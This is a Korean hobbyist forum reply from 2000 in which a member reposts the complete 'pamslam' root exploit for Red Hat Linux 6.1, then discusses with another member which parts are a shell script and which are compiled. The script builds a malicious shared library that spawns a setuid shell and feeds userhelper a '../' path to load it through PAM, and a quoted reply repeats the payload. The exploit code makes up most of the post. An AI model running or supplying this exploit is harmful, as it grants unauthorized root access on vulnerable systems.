<![CDATA[
움..멜로 보내드리려구 했는데 자꾸 닉네임을 넣으라구 하네여...어떻게 하는건질 몰겠어여^^;;;그냥 여기다 씁니다
<br>
^^;;;
<br>
#!/bin/sh
<br>
#
<br>
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
<br>
# found by dildog@l0pht.com
<br>
#
<br>
# synopsis:
<br>
# both 'pam' and 'userhelper' (a setuid binary that comes with the
<br>
# 'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
<br>
# _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
<br>
# being setuid means we can get root.
<br>
#
<br>
# fix:
<br>
# No fuckin idea for a good fix. Get rid of the .. paths in userhelper
<br>
# for a quick fix. Remember 'strcat' isn't a very good way of confining
<br>
# a path to a particular subdirectory.
<br>
#
<br>
# props to my mommy and daddy, cuz they made me drink my milk.
<br>
<br>
cat > _pamslam.c << EOF
<br>
#include
<br>
#include
<br>
#include
<br>
void _init(void)
<br>
{
<br>
setuid(geteuid());
<br>
system("/bin/sh");
<br>
}
<br>
EOF
<br>
<br>
echo -n .
<br>
<br>
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
<br>
chmod 755 _pamslam.conf
<br>
<br>
echo -n .
<br>
<br>
gcc -fPIC -o _pamslam.o -c _pamslam.c
<br>
<br>
echo -n o
<br>
<br>
ld -shared -o _pamslam.so _pamslam.o
<br>
<br>
echo -n o
<br>
<br>
chmod 755 _pamslam.so
<br>
<br>
echo -n O
<br>
<br>
rm _pamslam.c
<br>
rm _pamslam.o
<br>
<br>
echo O
<br>
<br>
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
<br>
<br>
sleep 1s
<br>
<br>
rm _pamslam.so
<br>
rm _pamslam.conf
<br>
<br>
<br>
<br>
<br>
저것은 님 말씀대로 스크립트인데^^;;;근데 전 저 스크립트를 실행하지 않았어여^^;;
<br>
전 저 스크립트 안에 내용을 하나씩 해본거라^^;;;컴파일해봤다는 말을 썼어여^^
<br>
gcc -fPIC -o _pamslam.o -c _pamslam.c
<br>
ld -shared -o _pamslam.so _pamslam.o
<br>
<br>
이부분이여^^
<br>
<br>
지적해주셔서 감사합니다^^제가 쓴글이 답변 받으니까
<br>
기분 좋네여^^헤헤 그럼 안녕히계세여^^ _(_ _)_
<br>
<br>
: 흠 저는 방금전에 승님께 이곳 주소를 물어보고 첨 왔습니다. 님께서 쓰신 글을 다 읽진 않았구요. 그냥 써봅니다.
<br>
: 중간에 보니깐.. 이렇게 쓰셨던데요..
<br>
:
<br>
: =========================중간=========================
<br>
:
<br>
: 움..일단 여기에서 처음
<br>
: cat > _pamslam.c << EOF
<br>
: #include
<br>
: #include
<br>
: #include
<br>
: void _init(void)
<br>
: {
<br>
: setuid(geteuid());
<br>
: system("/bin/sh");
<br>
: }
<br>
: EOF
<br>
:
<br>
: 이부분은 sh를 실행시키는 소스를 만드는것 같습니다. 그러나 main()항이 없어서 컴파일 될지 궁금
<br>
: 했는데
<br>
:
<br>
: ============================중간=======================
<br>
:
<br>
: 이건 스크립트인데 컴파일한다는게 쪼금 이상하군요.. ^^*
<br>
: 그리고 위에 주석처리 젤 처음에 보면은
<br>
:
<br>
: #!/bin/sh
<br>
:
<br>
: 이게 있는데 이건 이 소스를 sh 쉘에서 돌리라는 뜻입니다.
<br>
: bash, csh.... 등등 많은데요 sh 에서 돌리라는 뜻입니다.
<br>
: 아직 아래 글들은 막 복잡해서 안 읽어봤습니다.
<br>
: 미완성이시라니.. ^^* 저두 다시 읽어보구 수정할거 있으면 다시 알려드리겠습니다. 그럼 전 이만.
<br>
:
<!-- -->
]]>
카페 게시글
[공지]읽어주세요
Re:Re:님아 이건 스크립트인데요..
운누리
추천 0
조회 95
00.09.24 14:19
댓글 0
다음검색
